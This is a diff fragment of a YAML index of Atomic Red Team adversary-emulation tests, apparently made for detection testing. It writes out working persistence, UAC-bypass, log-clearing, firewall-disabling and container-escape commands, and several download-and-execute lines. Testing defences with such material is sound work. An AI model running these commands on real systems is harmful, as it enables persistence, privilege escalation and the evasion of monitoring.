@@ -15910,12 +15910,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -15931,7 +15931,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -16013,10 +16013,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1547.001: @@ -16142,11 +16142,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -16164,11 +16164,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -16194,7 +16194,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder 
@@ -16435,7 +16435,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -16452,10 +16452,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -16491,11 +16491,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -16517,7 +16517,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -16534,7 +16534,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -16545,7 +16545,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -16558,7 +16558,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -16570,7 +16570,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -16706,7 +16706,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -16963,7 +16963,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -16983,22 +16983,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -17054,7 +17054,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -17080,7 +17080,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux 
@@ -17096,14 +17096,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -17119,7 +17119,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true T1547.009: @@ -17193,7 +17193,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -17294,10 +17294,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1548.003: @@ -17365,7 +17365,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -17379,7 +17379,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -17394,7 +17394,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -17500,7 +17500,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: 
@@ -17573,15 +17573,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true @@ -18188,7 +18188,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -18200,13 +18200,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -18218,7 +18218,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1055.014: technique: @@ -18653,10 +18653,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" 
@@ -18689,10 +18689,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -18788,11 +18788,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -18811,11 +18811,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -18837,7 +18837,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -19331,10 +19331,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc 
@@ -19358,10 +19358,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -19399,7 +19399,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -19431,10 +19431,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 -' + ' name: command_prompt T1027.001: technique: @@ -19524,20 +19524,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) -' + ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'cp /bin/ls #{file_to_pad} -' + ' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} -' + ' cleanup_command: 'rm #{file_to_pad} -' + ' name: sh T1542.003: technique: @@ -19770,7 +19770,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -19792,7 +19792,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 
@@ -19814,7 +19814,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -19837,7 +19837,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -19860,7 +19860,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -19908,7 +19908,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -19921,11 +19921,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -20030,7 +20030,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands -' + ' supported_platforms: - windows input_arguments: 
@@ -20042,24 +20042,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) -' + ' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} -' + ' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file -' + ' supported_platforms: - windows input_arguments: @@ -20071,17 +20071,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) -' + ' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au -' + ' name: command_prompt T1574.012: technique: @@ -20192,7 +20192,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -20237,7 +20237,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -20275,7 +20275,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -20359,71 +20359,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm -' + ' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history -' + ' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm -' + ' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history -' + ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history -' + ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history -' + ' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate -' + ' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history -' + ' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero -' + ' supported_platforms: - linux - macos @@ -20438,7 +20438,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions -' + ' supported_platforms: - linux - macos @@ -20458,7 +20458,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file -' + ' supported_platforms: - linux - macos 
@@ -20473,13 +20473,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog -' + ' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting -' + ' prereq_command: | /usr/sbin/useradd testuser1 echo pwd101! | passwd testuser1 --stdin @@ -20489,35 +20489,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname -' + ' cleanup_command: 'userdel -f testuser1 -' + ' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history -' + ' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing -' + ' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history -' + ' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath -' + ' name: powershell T1070.002: technique: @@ -20568,7 +20568,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs -' + ' supported_platforms: - macos - linux @@ -20584,7 +20584,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -20595,14 +20595,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} -' + ' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: 
@@ -20613,7 +20613,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} -' + ' name: bash T1070.001: technique: @@ -20681,7 +20681,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. -' + ' supported_platforms: - windows input_arguments: @@ -20692,7 +20692,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} -' + ' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -20721,7 +20721,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -20731,7 +20731,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -21042,10 +21042,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -21053,10 +21053,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} -' + ' cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef 
@@ -21078,18 +21078,18 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} -' + ' executor: command: 'Invoke-Expression #{input_file} -' + ' name: powershell T1218.001: technique: @@ -21169,17 +21169,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) -' + ' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} -' + ' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -21196,7 +21196,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} -' + ' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -21222,7 +21222,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -21255,7 +21255,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' 
@@ -21280,7 +21280,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -21321,7 +21321,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -21360,7 +21360,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -21513,17 +21513,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) -' + ' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} -' + ' name: command_prompt T1578.002: technique: @@ -21854,10 +21854,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" 
@@ -21865,7 +21865,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -21977,16 +21977,16 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows executor: command: 'net user guest /active:yes -' + ' cleanup_command: 'net user guest /active:no -' + ' name: command_prompt elevation_required: true T1578.003: @@ -22125,7 +22125,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) -' + ' supported_platforms: - windows input_arguments: @@ -22148,7 +22148,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -22164,13 +22164,13 @@ defense-evasion: dependencies: - description: 'Python must be present -' + ' prereq_command: 'which python3 -' + ' get_prereq_command: 'echo "Please install Python 3" -' + ' executor: name: sh elevation_required: false @@ -22187,7 +22187,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -22203,13 +22203,13 @@ defense-evasion: dependencies: - description: 'Perl must be present -' + ' prereq_command: 'which perl -' + ' get_prereq_command: 'echo "Please install Perl" -' + ' executor: name: sh elevation_required: false @@ -22223,7 +22223,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos 
@@ -22254,7 +22254,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -22270,13 +22270,13 @@ defense-evasion: dependencies: - description: 'xxd must be present -' + ' prereq_command: 'which xxd -' + ' get_prereq_command: 'echo "Please install xxd" -' + ' executor: name: sh elevation_required: false @@ -22375,24 +22375,24 @@ defense-evasion: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -22400,14 +22400,14 @@ defense-evasion: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl 
@@ -22417,11 +22417,11 @@ defense-evasion: -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod -' + ' T1006: technique: id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5 @@ -22663,7 +22663,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true -' + ' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -22822,10 +22822,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off -' + ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 -' + ' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -22838,11 +22838,11 @@ defense-evasion: command: 'reg add 